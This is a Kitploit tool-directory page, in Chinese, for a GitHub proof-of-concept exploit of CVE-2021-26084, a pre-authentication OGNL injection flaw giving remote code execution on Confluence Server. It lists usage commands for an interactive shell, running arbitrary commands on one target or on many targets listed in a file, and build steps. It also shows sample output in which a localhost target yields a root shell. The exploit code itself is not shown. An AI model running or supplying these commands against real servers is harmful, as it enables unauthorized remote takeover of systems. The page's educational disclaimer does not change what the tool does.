Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-26084 — CVE-2021-26084 - Confluence Server Webwork OGNL 注入(预认证 RCE) | Kitploit
工具/GitHubGitHub/taythebot/cve-2021-26084
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育远程访问工具
GitHubtaythebot/cve-2021-26084

CVE-2021-26084

CVE-2021-26084 - Confluence Server Webwork OGNL 注入(预认证 RCE)

查看仓库
865年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-26084

CVE-2021-26084 的概念验证。

Confluence Server Webwork OGNL 注入(预认证 RCE)

免责声明

本工具仅供教育目的使用。本人不对你的行为负责。请自行斟酌使用。

命令限制

由于 payload 限制,某些字符无法传入。以下列表是我在测试中发现的。

  • 双引号 "
  • 竖线 |

交互式 Shell

root@kitploit:~
 go run exploit.go -t <target> -i

示例

root@kitploit:~
root@localhost:/# go run exploit.go -t http://localhost:8090 -i
CVE-2021-26084 - Confluence Server Webwork OGNL injection
Made by Tay (https://github.com/taythebot)
time="2021-09-02T00:29:37+09:00" level=info msg="Checking if https://localhost:8090 is vulnerable"
time="2021-09-02T00:29:39+09:00" level=info msg="Target https://localhost:8090 is vulnerable"
root@confluence:/# whoami
root
root@confluence:/# exit
Exiting interactive mode, goodbye
  • 仅适用于单个目标
  • 输入 exit 退出交互式 Shell
  • 如有可能是 Windows 机器,将显示提示

单个目标

root@kitploit:~
go run exploit.go -t <target> -c <command>

多个目标

root@kitploit:~
go run exploit.go -f <file> -c <command>

构建

root@kitploit:~
go mod download
go build exploit.go
下载工具